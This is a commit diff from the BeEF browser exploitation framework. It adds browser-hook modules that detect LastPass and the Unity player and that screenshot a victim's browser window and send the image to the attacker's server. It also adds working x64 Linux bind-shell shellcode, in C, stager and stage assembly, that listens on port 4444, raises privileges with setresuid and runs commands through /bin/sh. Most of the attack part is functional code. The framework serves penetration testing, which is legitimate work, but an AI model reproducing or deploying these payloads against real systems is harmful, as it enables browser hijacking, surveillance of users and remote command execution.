 		#

modules/browser/browser_fingerprinting/command.js

@@ -34,6 +34,10 @@ beef.execute(function() {
 		new Array("Firefox","4+","resource:///chrome/browser/skin/classic/browser/Geolocation-16.png"),
 		new Array("Firefox","7+","resource:///chrome/browser/content/browser/aboutHome-snippet1.png"),
 		new Array("Firefox","8+","resource:///chrome/browser/skin/classic/aero/browser/Toolbar-inverted.png"),
+		new Array("Firefox","9+","resource:///chrome/browser/skin/classic/aero/browser/identity.png"),
+		new Array("Firefox","10+","chrome://browser/skin/sync-128.png"),
+		new Array("Firefox","13+","chrome://browser/content/abouthome/noise.png"),
+		new Array("Firefox","18+","resource:///chrome/browser/skin/classic/aero/browser/webRTC-shareDevice-16.png"),
 		new Array("Internet Explorer","5-6","res://shdoclc.dll/pagerror.gif"),
 		new Array("Internet Explorer","7-9","res://ieframe.dll/ielogo.png"),
 		new Array("Internet Explorer","7+","res://ieframe.dll/info_48.png")

modules/browser/detect_lastpass/command.js

@@ -0,0 +1,29 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+	var result = "Not in use or not installed";
+
+	var lpdiv = document.getElementById('hiddenlpsubmitdiv');
+	if (typeof(lpdiv) != 'undefined' && lpdiv != null) {
+		//We've got the first detection of LP
+		result = "Detected LastPass through presence of the <script> tag with id=hiddenlpsubmitdiv";
+	} else if ($j("script:contains(lastpass_iter)").length > 0) {
+		//We've got the second detection of LP
+		result = "Detected LastPass through presense of the embedded <script> which includes references to lastpass_iter";
+	} else {
+
+		//Form is not there, lets check for any form elements in this page, because, LP won't activate at all without a <form>
+		if (document.getElementsByTagName("form").length == 0) {
+			//No forms
+			result = "The page doesn't seem to include any forms - we can't tell if LastPass is installed";
+		}
+		
+	}
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "lastpass="+result);
+});
+

modules/browser/detect_lastpass/config.yaml

@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_lastpass:
+            enable: true
+            category: "Browser"
+            name: "Detect LastPass"
+            description: "This module checks if the LastPass extension is installed and active."
+            authors: ["xntrik"]
+            target:
+                 not_working: ["IE"]
+                 working: ["All"]

modules/browser/detect_lastpass/module.rb

@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_lastpass < BeEF::Core::Command
+
+	def post_execute 
+		content = {}
+		content['lastpass'] = @datastore['lastpass'] if not @datastore['lastpass'].nil?
+		save content
+	end
+
+end

modules/browser/detect_unity/command.js

@@ -0,0 +1,60 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+	
+	var hasUnity = function() {
+		
+		// Internet Explorer
+		if ( beef.browser.isIE() ) {
+			
+			try {
+					var unity_test = new ActiveXObject('UnityWebPlayer.UnityWebPlayer.1');
+				} catch (e) { }
+				
+			if ( unity_test ) {
+				return true;
+			}
+		
+		// Not Internet Explorer	
+		} else if ( navigator.mimeTypes && navigator.mimeTypes["application/vnd.unity"] ) {
+			
+			if ( navigator.mimeTypes["application/vnd.unity"].enabledPlugin &&
+	            navigator.plugins &&
+				navigator.plugins["Unity Player"] ) {
+
+				return true;
+
+				}
+			
+		}
+		
+		return false;		
+	
+	}
+	
+	
+	
+	if ( hasUnity() ) {
+		
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "unity = Unity Web Player is enabled");
+		
+		if ( !beef.browser.isIE() ) {
+			
+			var unityRegex = /Unity Web Player version (.*). \(c\)/g;
+			var match = unityRegex.exec(navigator.plugins["Unity Player"].description);
+			
+			beef.net.send("<%= @command_url %>", <%= @command_id %>, "unity version = "+ match[1]);
+			
+		}
+		
+	} else {
+		
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "unity = Unity Web Player is not enabled");
+	
+	}
+	
+});

modules/browser/detect_unity/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        Detect_unity:
+            enable: true
+            category: "Browser"
+            name: "Detect Unity Web Player"
+            description: "Detects Unity Web Player."
+            authors: ["gcattani"]
+            target:
+                working: ["All"]

modules/browser/detect_unity/module.rb

@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_unity < BeEF::Core::Command
+  
+  def post_execute
+    content = {}
+    content['unity'] = @datastore['unity']
+    save content
+  end
+
+end

modules/browser/hooked_domain/deface_web_page/module.rb

@@ -7,7 +7,8 @@ class Deface_web_page < BeEF::Core::Command
 
   def self.options
 	configuration = BeEF::Core::Configuration.instance
-	favicon_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/favicon.ico"
+    proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
+	favicon_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/favicon.ico"
     return [
 		{ 'name' => 'deface_title', 'description' => 'Page Title', 'ui_label' => 'New Title', 'value' => 'BeEF - The Browser Exploitation Framework Project', 'width'=>'200px' },
 		{ 'name' => 'deface_favicon', 'description' => 'Shortcut Icon', 'ui_label' => 'New Favicon', 'value' => favicon_uri, 'width'=>'200px' },

modules/browser/hooked_domain/get_page_html/command.js

@@ -6,18 +6,7 @@
 
 beef.execute(function() {
 
-	try {
-		var html_head = document.head.innerHTML.toString();
-	} catch (e) {
-		var html_head = "Error: document has no head";
-	}
-	try {
-		var html_body = document.body.innerHTML.toString();
-	} catch (e) {
-		var html_body = "Error: document has no body";
-	}
-
-	beef.net.send("<%= @command_url %>", <%= @command_id %>, 'head='+html_head+'&body='+html_body);
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, 'head='+beef.browser.getPageHead()+'&body='+beef.browser.getPageBody());
 
 });
 

modules/browser/hooked_domain/get_stored_credentials/module.rb

@@ -7,7 +7,8 @@ class Get_stored_credentials < BeEF::Core::Command
 
 	def self.options
 		configuration = BeEF::Core::Configuration.instance
-		uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/butcher/index.html"
+		proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
+		uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/butcher/index.html"
 		return [
 			{ 'name' => 'login_url', 'description' => 'Login URL', 'ui_label' => 'Login URL', 'value' => uri, 'width'=>'400px' }
 		]

modules/browser/hooked_domain/site_redirect_iframe/module.rb

@@ -7,7 +7,8 @@ class Site_redirect_iframe < BeEF::Core::Command
   
     def self.options
 		configuration = BeEF::Core::Configuration.instance
-		favicon_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/favicon.ico"
+		proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
+		favicon_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/favicon.ico"
         return [
 			  { 'name' => 'iframe_title', 'description' => 'Title of the iFrame', 'ui_label' => 'New Title', 'value' => 'BeEF - The Browser Exploitation Framework Project', 'width'=>'200px' },
 			  { 'name' => 'iframe_favicon', 'description' => 'Shortcut Icon', 'ui_label' => 'New Favicon', 'value' => favicon_uri, 'width'=>'200px' },

modules/browser/play_sound/module.rb

@@ -9,8 +9,9 @@ class Play_sound < BeEF::Core::Command
   def self.options
 
     configuration = BeEF::Core::Configuration.instance
+    proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
 
-    sound_file_url = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/sound.wav"
+    sound_file_url = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/sound.wav"
 
     return [{
       'name' => 'sound_file_uri', 

modules/browser/spyder_eye/command.js

@@ -0,0 +1,22 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var script = document.createElement( 'script' );
+	script.type = 'text/javascript';
+	script.src = beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/html2canvas.js';
+	$j("body").append( script );
+
+	html2canvas(document.body, {
+		onrendered: function(canvas) {
+			var img = canvas.toDataURL("image/png");
+			beef.net.send("<%= @command_url %>", <%= @command_id %>, "image="+img);
+			//beef.net.send("<%= @command_url %>", <%= @command_id %>, "image=All done");
+		}
+	});
+
+});

modules/browser/spyder_eye/config.yaml

@@ -0,0 +1,31 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        spyder_eye:
+            enable: true
+            category: "Browser"
+            name: "Spyder Eye"
+            description: "This module takes a picture of the victim's browser window."
+            authors: ["preth00nker"]
+            target:
+                working:
+                    IE:
+                        min_ver: 9
+                        max_ver: latest
+                    FF:
+                        min_ver: 3
+                        max_ver: latest
+                    C:
+                        min_ver: 1
+                        max_ver: latest
+                    S:
+                        min_ver: 6
+                        max_ver: latest
+                    O:
+                        min_ver: 12
+                        max_ver: latest
+                not_working: ["All"]

modules/browser/spyder_eye/module.rb

@@ -0,0 +1,35 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Spyder_eye < BeEF::Core::Command
+  require 'base64'
+
+  def pre_send
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/spyder_eye/html2canvas.js', '/html2canvas', 'js')
+  end
+
+  def post_execute 
+    content = {}
+    content['results'] = @datastore['results'] if not @datastore['results'].nil?
+    save content
+
+    # save screenshot file
+    begin
+      filename = "screenshot_#{Integer(@datastore['cid'])}.png"
+      File.open(filename, 'wb') do |file|
+        data = @datastore['results'].gsub(/^image=data:image\/(png|jpg);base64,/, "")
+        file.write(Base64.decode64(data))
+      end
+      print_info("Browser screenshot saved to '#{filename}'")
+      BeEF::Core::Logger.instance.register("Zombie", "Browser screenshot saved to '#{filename}'")
+    rescue Exception => e
+      print_error("Could not write screenshot file '#{filename}' - Exception: #{e.message}")
+    end
+
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/html2canvas.js')
+  end
+
+end
+

modules/browser/webcam/command.js

@@ -43,10 +43,10 @@ beef.execute(function() {
     theHead.appendChild(style);
     
     //A nice library that helps us to include the swf file
-    var swfobject_script = '<script type="text/javascript" src="http://'+beef.net.host+':'+beef.net.port+'/swfobject.js"></script>'
+    var swfobject_script = '<script type="text/javascript" src="'+beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/swfobject.js"></script>'
     
     //This is the javascript that actually calls the swfobject library to include the swf file 
-    var include_script = '<script>var flashvars = {\'no_of_pictures\':\'<%= @no_of_pictures %>\', \'interval\':\'<%= @interval %>\'}; var parameters = {}; parameters.scale = "noscale"; parameters.wmode = "opaque"; parameters.allowFullScreen = "true"; parameters.allowScriptAccess = "always"; var attributes = {}; swfobject.embedSWF("http://'+beef.net.host+':'+beef.net.port+'/takeit.swf", "main", "403", "345", "9", "expressInstall.swf", flashvars, parameters, attributes, swfobjectCallback);</script>';
+    var include_script = '<script>var flashvars = {\'no_of_pictures\':\'<%= @no_of_pictures %>\', \'interval\':\'<%= @interval %>\'}; var parameters = {}; parameters.scale = "noscale"; parameters.wmode = "opaque"; parameters.allowFullScreen = "true"; parameters.allowScriptAccess = "always"; var attributes = {}; swfobject.embedSWF("'+beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/takeit.swf", "main", "403", "345", "9", "expressInstall.swf", flashvars, parameters, attributes, swfobjectCallback);</script>';
     
     //Empty body first
     $j('body').html('');

modules/browser/webcam_permission_check/command.js

@@ -62,10 +62,10 @@ beef.execute(function() {
     });
         
     //A library that helps include the swf file
-    //var swfobject_script = '<script type="text/javascript" src="http://'+beef.net.host+':'+beef.net.port+'/swfobject.js"></script>'
+    //var swfobject_script = '<script type="text/javascript" src="'+beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/swfobject.js"></script>'
     
     //This is the javascript that actually calls the swfobject library to include the swf file 
-    //var include_script = '<script>var flashvars = {}; var parameters = {}; parameters.scale = "noscale"; parameters.wmode = "opaque"; parameters.allowFullScreen = "true"; parameters.allowScriptAccess = "always"; var attributes = {}; swfobject.embedSWF("http://'+beef.net.host+':'+beef.net.port+'/cameraCheck.swf", "main", "1", "1", "9", "expressInstall.swf", flashvars, parameters, attributes, swfobjectCallback);</script>';
+    //var include_script = '<script>var flashvars = {}; var parameters = {}; parameters.scale = "noscale"; parameters.wmode = "opaque"; parameters.allowFullScreen = "true"; parameters.allowScriptAccess = "always"; var attributes = {}; swfobject.embedSWF("'+beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/cameraCheck.swf", "main", "1", "1", "9", "expressInstall.swf", flashvars, parameters, attributes, swfobjectCallback);</script>';
     
 
     //Add flash content

modules/chrome_extensions/inject_beef/command.js

@@ -6,7 +6,7 @@
 
 beef.execute(function() {
 
-        var beefHookUri = "http://" + beef.net.host + ":" + beef.net.port + beef.net.hook;
+        var beefHookUri = beef.net.httpproto + "://" + beef.net.host + ":" + beef.net.port + beef.net.hook;
 
         chrome.windows.getAll({"populate" : true}, function(windows) {
 			for(i in windows) {

modules/debug/test_http_bind_raw/module.rb

@@ -7,7 +7,8 @@ class Test_http_bind_raw < BeEF::Core::Command
 
   def pre_send
     configuration = BeEF::Core::Configuration.instance
-    xss_hook_url = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/basic.html"
+    proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
+    xss_hook_url = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/basic.html"
     BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw('200', {'Content-Type'=>'text/html','beef'=>xss_hook_url}, 'hello world!', '/beef', -1)
   end
 

modules/exploits/beefbind/beef_bind_staged_deploy/command.js

@@ -13,6 +13,7 @@ beef.execute(function () {
 
     var beef_host = '<%= @beef_host %>';
     var beef_port = '<%= @beef_port %>';
+    var beef_proto = beef.net.httpproto;
     var beef_junk_port = '<%= @beef_junk_port %>';
     var sock_name = '<%= @beef_junk_socket %>';
 
@@ -190,7 +191,7 @@ beef.execute(function () {
     var size,host,contenttype,referer,nops = null;
     get_junk_size = function(){
         var junk_name = "";
-        var uri = "http://" + beef_host + ":" + beef_port + "/api/ipec/junk/" + sock_name;
+        var uri = beef_proto + "://" + beef_host + ":" + beef_port + "/api/ipec/junk/" + sock_name;
 
         $j.ajax({
             type: "GET",

modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/socket64.c

@@ -0,0 +1,27 @@
+/**
+ Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+ Browser Exploitation Framework (BeEF) - http://beefproject.com
+ See the file 'doc/COPYING' for copying permission
+ 
+ The C-skeleton to compile and test this shellcode is used with kind permission of Vivek Ramachandran. A standalone version can be compiled with:
+ #gcc -fno-stack-protector -z execstack -o socket64 socket64.c
+**/
+
+#include <stdio.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+
+int (*sc)();
+
+char shellcode[] = "\xfc\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x89\xc3\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01\x5e\x48\x89\xdf\x6a\x36\x58\x0f\x05\x48\x31\xc0\x6a\x10\x5a\x50\x50\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31\x58\x0f\x05\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48\x31\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7\x48\x89\xdf\x6a\x03\x58\x0f\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e\x6a\x07\x5a\x6a\x22\x41\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58\x0f\x05\x49\x89\xc6\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x10\x6a\x00\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f\x05\x4c\x89\xf6\x81\x3e\x63\x6d\x64\x3d\x74\x05\x48\xff\xc6\xeb\xf3\x6a\x04\x58\x48\x01\xc6\xff\xe6";
+
+int main(int argc, char **argv) {
+   char *ptr = mmap(0, sizeof(shellcode), PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+   if (ptr == MAP_FAILED) {perror("mmap");exit(-1);}
+   memcpy(ptr, shellcode, sizeof(shellcode));
+   sc = (int(*)())ptr;
+   (void)((void(*)())ptr)();
+   printf("\n");
+   return 0;
+}

modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/stage64.nasm

@@ -0,0 +1,285 @@
+BITS 64
+
+SECTION .text
+global _start
+_start:
+	cld ;clear direction flag
+	xor rdx,rdx ;zero rdx
+
+	push BYTE 0x02
+	pop r14
+
+	;create two pipes
+createpipes:
+	push rdx ;allocate space on the stack
+	mov rdi, rsp ;point to the stack
+	push BYTE 0x16 
+	pop rax ;sys_pipe
+	syscall
+	dec r14
+	test r14, r14 ;create 2 pipes 
+	je endcreatepipes
+	jmp createpipes
+
+endcreatepipes:
+	;sys_fork
+	push BYTE 0x39
+	pop rax
+	syscall
+	cmp eax, 0x00 ;parent or child?
+	je child
+
+	xor rdi, rdi ; zero rdi
+	mov edi, DWORD [rsp+0x8] ; close read end of one pipe
+	push BYTE 0x03
+	pop rax ;sys_close
+	syscall
+
+	mov edi, DWORD [rsp+0x4] ;close write end of the other pipe
+	push BYTE 0x03
+	pop rax ;sys_close
+	syscall
+
+	;make non-blocking
+	mov edi, DWORD [rsp] ;fd
+	push BYTE 0x04
+	pop rsi ;F_SETFL
+	xor rdx, rdx
+	mov rdx, 0x800 ;O_NONBLOCK
+	push BYTE 0x48
+	pop rax ; sys_fcntl
+	syscall	
+
+
+	;allocate one page of memory
+	xor rdi,rdi ;system determines location
+	push 0x1000 ;allocated size
+	pop rsi
+	push BYTE 0x07
+	pop rdx ;PROT_READ | PROT_WRITE | PROT_EXEC
+	push BYTE 0x22
+	pop r10 ; MAP_ANONYMOUS | MAP_PRIVATE
+	push rdi
+	push rdi
+	pop r9 ;offset
+	pop r8 ;fd
+	push BYTE 0x09
+	pop rax
+	syscall
+	mov r14, rax ;save pointer allocated memory for later use
+
+doforever:
+	;initialize socket
+	xor rdx, rdx ;zero rdx (proto =0)
+	push BYTE 0x01
+	pop rsi ;SOCK_STREAM
+	push BYTE 0x02
+	pop rdi ;AF_INET = 2
+	push BYTE 0x29
+	pop rax ;sys_socket
+	syscall
+	mov rbx, rax ; save socket filediscriptor
+
+	;reuse socket
+	push 0x01  ;true
+	mov r10, rsp ;ptr to optval
+	push BYTE 0x08
+	pop r8 ;sizeof socklen_t
+	push BYTE 0x02
+	pop rdx  ;SO_REUSEADDR = 2
+	push BYTE 0x01
+	pop rsi ;SOL_SOCKET = 1	
+	mov rdi, rbx ;socketfd
+	push BYTE 0x36 ;sys_setsockopt
+	pop rax
+	syscall
+
+	pop rax ;clean stack
+
+
+	;bind socket to port
+	xor rax,rax
+	push BYTE 0x10
+	pop rdx ;addrlen
+	push rax
+	push rax
+	mov DWORD [rsp], 0x5C110002 ;PORT 0x115c = 4444
+	mov rsi, rsp ;ptr to sokaddr
+	mov rdi, rbx ;socketfd
+	push BYTE 0x31
+	pop rax ;sys_bind
+	syscall
+
+	pop rax ;clean stack
+	pop rax
+
+	;listen 
+	xor rsi, rsi ;backlog ptr = NULL
+	mov rdi, rbx ;socketfd
+	push BYTE 0x32
+	pop rax ;sys_listen
+	syscall
+
+	;accept
+	xor rdx,rdx ;addrlen ptr = NULL
+	xor rsi,rsi ;sockaddr ptr = NULL
+	mov rdi, rbx ;socketfd
+	push BYTE 0x2b
+	pop rax ;sys_accept
+	syscall
+
+	mov r15, rax ;save client socket fd for later use
+
+	;close serversocket
+	mov rdi, rbx ;close server socket fd
+	push BYTE 0x03
+	pop rax ;sys_close
+	syscall 
+
+
+	mov rcx, 0x1000 ;pagesize
+firstzeromemory:
+	;zero out memory
+	dec rcx
+	mov rbx, r14
+	add rbx, rcx
+	mov BYTE [rbx], 0x00
+	jrcxz readfromsocket
+	jmp firstzeromemory 	
+
+readfromsocket:
+	xor rdx, rdx
+
+	;read into allocated memory
+	mov rdi, r15 ;client socketfd
+	mov rsi, r14 ;ptr to allocated memory
+	mov dx, 0x400 ;read 1024 bytes
+	push BYTE 0x00
+	pop rax ;sys_read
+	syscall
+
+	mov rcx, 0x400 ;search in 1024 bytes 
+	mov rbx, r14 ;ptr to allocated memory
+search:
+	cmp DWORD[rbx], 0x3d646d63 ;compare with "cmd="
+	je found ;cmd= found
+	inc rbx
+	dec rcx
+	jrcxz notfound ;cmd= not in recieved buffer
+	jmp search ;search some more
+found:
+	xor rdi, rdi
+	mov rcx, rbx 
+	add rcx, 0x03 ;skip "cmd"
+	mov rsi, rcx
+	mov edi, DWORD [rsp+0xC] ;write to pipe
+sendcommand:
+	inc rsi ;first time skip "=", move to next byte
+	push BYTE 0x01
+	pop rdx ;write one byte
+	push BYTE 0x01
+	pop rax ;sys_write
+	syscall
+	cmp BYTE [rsi], 0x0a ;LF character?
+	jne sendcommand ;else continue write to pipe
+
+	;sleep one second
+	push BYTE 0x23
+	pop rax ;sys_nanosleep
+	push DWORD 0x00
+	push DWORD 0x01 ;one second
+	mov rdi, rsp ;ptr to argument array
+	xor rsi, rsi ;NULL
+	syscall
+
+	pop rax ;clean stack
+	pop rax
+
+notfound:
+	call writehttpheaders
+	db 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20,0x32,0x30,0x30,0x20,0x4f,0x4b,0x0d,0x0a
+	db 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x0d,0x0a
+	db 0x41,0x63,0x63,0x65,0x73,0x73,0x2d,0x43,0x6f,0x6e,0x74,0x72,0x6f,0x6c,0x2d,0x41,0x6c,0x6c,0x6f,0x77,0x2d,0x4f,0x72,0x69,0x67,0x69,0x6e,0x3a,0x20,0x2a,0x0d,0x0a
+	db 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20,0x33,0x30,0x34,0x38,0x0d,0x0a,0x0d,0x0a
+
+writehttpheaders:
+	pop rsi ;source address saved by call
+	mov rdi, r14 ;ptr to allocated memory
+	add rdi, 0x400 ;skip 1024 bytes
+	mov rcx, 0x62 ;copy 98 bytes
+	rep movsb
+
+	xor rdi, rdi ;zero rdi
+	mov edi, DWORD [rsp] ;read from pipe
+	mov rsi, r14 ;ptr to allocated memory
+	add rsi, 0x400 ;skip 1024 bytes
+	add rsi, 0x62 ;skip header
+	mov rdx, 0xb86 ;read max 2950 bytes	
+	xor rax,rax ;sys_read
+	syscall
+
+
+	mov rdi, r15 ;clientsocket fd
+	mov rsi, r14 ;ptr to allocated memory
+	add rsi, 0x400 ;skip 1024 first bytes
+	mov rdx, 0xbe8 ;send max 3048 bytes
+	push BYTE 0x01
+	pop rax ;sys_write
+	syscall
+
+	mov rdi, r15 ;close clientsocket fd
+	push BYTE 0x03
+	pop rax ;sys_close
+	syscall
+	
+	jmp doforever
+child:
+	xor rdi, rdi 
+	mov edi, DWORD [rsp+0xc] ;close output side of pipe
+	push BYTE 0x03
+	pop rax ;sys_close
+	syscall
+
+	xor rdi, rdi ;close stdin
+	push BYTE 0x03
+	pop rax ;sys_close
+	syscall
+
+	mov edi, DWORD [rsp+0x08] ;dup input side to stdin
+	push BYTE 0x20
+	pop rax ;sys_dup
+	syscall
+
+
+	mov edi, DWORD [rsp] ;close input side of other pipe
+	push BYTE 0x03
+	pop rax ;sys_close
+	syscall
+
+	xor rdi, rdi
+	inc rdi ;close stdout
+	push BYTE 0x03
+	pop rax ;sys_close
+	syscall
+
+	mov edi, DWORD [rsp+0x4] ;dup output side to stdout
+	push BYTE 0x20
+	pop rax ;sys_dup
+	syscall
+
+	;setresuid(0,0,0)
+	xor rdi, rdi
+	xor rsi, rsi
+	xor rdx, rdx
+	push BYTE 0x75
+	pop rax ;sys_resuid
+	syscall
+
+	push BYTE 0x3b
+	pop rax ;sys_execve
+	mov rdi, 0x0068732f6e69622f ;/bin/shNULL
+	push rdi ;push to stack
+	mov rdi, rsp ;ptr to stack
+	xor rsi, rsi ;NULL
+	xor rdx, rdx ;NULL
+	syscall

modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/stager64.nasm

@@ -0,0 +1,106 @@
+BITS 64
+
+SECTION .text
+global _start
+_start:
+	cld ;clear direction flag
+	xor rdx, rdx ;zero rdx (proto=0)
+	push BYTE 0x01
+	pop rsi ;SOCK_STREAM
+	push BYTE 0x02
+	pop rdi ;AF_INET = 2
+	push BYTE 0x29
+	pop rax ;sys_socket
+	syscall
+	mov rbx, rax ; save socket filediscriptor
+
+	;reuse socket
+	push 0x01  ;true
+	mov r10, rsp ;ptr to optval
+	push BYTE 0x08
+	pop r8 ;sizeof socklen_t
+	push BYTE 0x02
+	pop rdx ;SO_REUSEADDR = 2
+	push BYTE 0x01
+	pop rsi ;SOL_SOCKET = 1
+	mov rdi, rbx ;socketfd
+	push BYTE 0x36 ;sys_setsockopt
+	pop rax
+	syscall
+
+	xor rax,rax
+	push BYTE 0x10
+	pop rdx ;addrlen
+	push rax
+	push rax
+	mov DWORD [rsp], 0x5c110002 ;PORT 0x115c = 4444
+	mov rsi, rsp ;ptr to sokaddr
+	mov rdi, rbx ;socketfd
+	push BYTE 0x31
+	pop rax ;sys_bind
+	syscall
+
+	xor rsi, rsi ;backlog ptr = NULL
+	mov rdi, rbx ;socketfd
+	push BYTE 0x32
+	pop rax ;sys_listen
+	syscall
+
+	;accept
+	xor rdx,rdx ;addrlen ptr = NULL
+	xor rsi,rsi ;sockaddr ptr = NULL
+	mov rdi, rbx ;socketfd
+	push BYTE 0x2B
+	pop rax ;sys_accept
+	syscall
+
+	mov r15, rax ;save client socket fd for later use
+
+	mov rdi, rbx ;close server socket fd
+	push BYTE 0x03
+	pop rax ;sys_close
+	syscall 
+
+	;allocate memory
+	
+	xor rdi,rdi ;system determines location
+	push 0x1000 ;allocated size
+	pop rsi
+	push BYTE 0x07
+	pop rdx ;PROT_READ | PROT_WRITE | PROT_EXEC
+	push BYTE 0x22
+	pop r10 ; MAP_ANONYMOUS | MAP_PRIVATE
+	push rdi
+	push rdi
+	pop r9 ;offset
+	pop r8 ;fd
+	push BYTE 0x09
+	pop rax
+	syscall
+	mov r14, rax ;save pointer allocated memory for later use
+
+	;read into allocated memory
+	mov rdi, r15 ;client socketfd
+	mov rsi, r14 ;ptr to allocated memory
+	mov dx, 0x1000 ;read one page of memory
+	push BYTE 0x00
+	pop rax ;sys_read
+	syscall
+
+	;close clientsocketfd
+	mov rdi, r15 ;client socketfd
+	push BYTE 0x03
+	pop rax ;sys_close
+	syscall
+
+	mov rsi, r14 ;ptr to allocated memory
+search:
+	cmp DWORD [rsi], 0x3d646d63 ;compare with "cmd="
+	je short found ;cmd= found
+	inc rsi
+	jmp short search ;search some more
+found:
+	push BYTE 0x04 ;skip "cmd="
+	pop rax
+	add rsi, rax
+	jmp rsi ;jump to stage

modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/socket.c

@@ -0,0 +1,27 @@
+/**
+ Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+ Browser Exploitation Framework (BeEF) - http://beefproject.com
+ See the file 'doc/COPYING' for copying permission
+ 
+ The C-skeleton to compile and test this shellcode is used with kind permission of Vivek Ramachandran. A standalone version can be compiled with:
+ #gcc -m32 -fno-stack-protector -z execstack -o socket socket.c
+**/
+
+#include <stdio.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+
+int (*sc)();
+
